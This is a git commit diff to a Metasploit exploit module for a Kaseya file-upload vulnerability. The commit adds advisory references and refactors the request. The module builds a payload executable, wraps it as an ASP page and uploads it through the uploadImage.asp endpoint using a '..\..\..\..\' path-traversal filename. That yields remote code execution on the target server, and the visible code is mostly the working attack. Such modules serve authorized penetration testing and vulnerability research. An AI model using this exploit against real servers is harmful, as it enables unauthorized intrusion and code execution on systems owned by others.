Update based on jvazquez's suggestions.
parent
d1e4975f76
commit
21bb8fd25a
|
@ -26,7 +26,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Thomas Hibbert <thomas.hibbert@security-assessment.com' # Vulnerability discovery and MSF module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' => [['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf']],
|
||||
'References' => [
|
||||
['URL', 'http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf'],
|
||||
['OSVDB', '99984'],
|
||||
['BID', '63782'],
|
||||
['EDB', '29675']
|
||||
],
|
||||
'Payload' => {},
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86,
|
||||
|
@ -47,15 +52,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# the vuln was patched by removing uploadImage.asp. if the page is there, calling it without params will return 500, else 404
|
||||
|
||||
if not res or res.code != 500
|
||||
return Exploit::Faliure::UnexpectedReply
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Appears
|
||||
end
|
||||
|
||||
def exploit
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
||||
@payload_name = "#{rand_text_alpha_lower(8)}.asp"
|
||||
exe = generate_payload_exe
|
||||
asp = Msf::Util::EXE.to_exe_asp(exe)
|
||||
|
@ -74,7 +77,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
res = send_request_cgi({
|
||||
"method" => "POST",
|
||||
"uri" => normalize_uri("SystemTab","uploadImage.asp?filename=..\\..\\..\\..\\#{@payload_name}"),
|
||||
"uri" => normalize_uri("SystemTab","uploadImage.asp"),
|
||||
"vars_get" => {
|
||||
"filename" => "..\\..\\..\\..\\#{@payload_name}"
|
||||
},
|
||||
"data" => data,
|
||||
"ctype" => "multipart/form-data; boundary=#{post_data.bound}",
|
||||
"cookie" => cookie
|
||||
|
|
Loading…
Reference in New Issue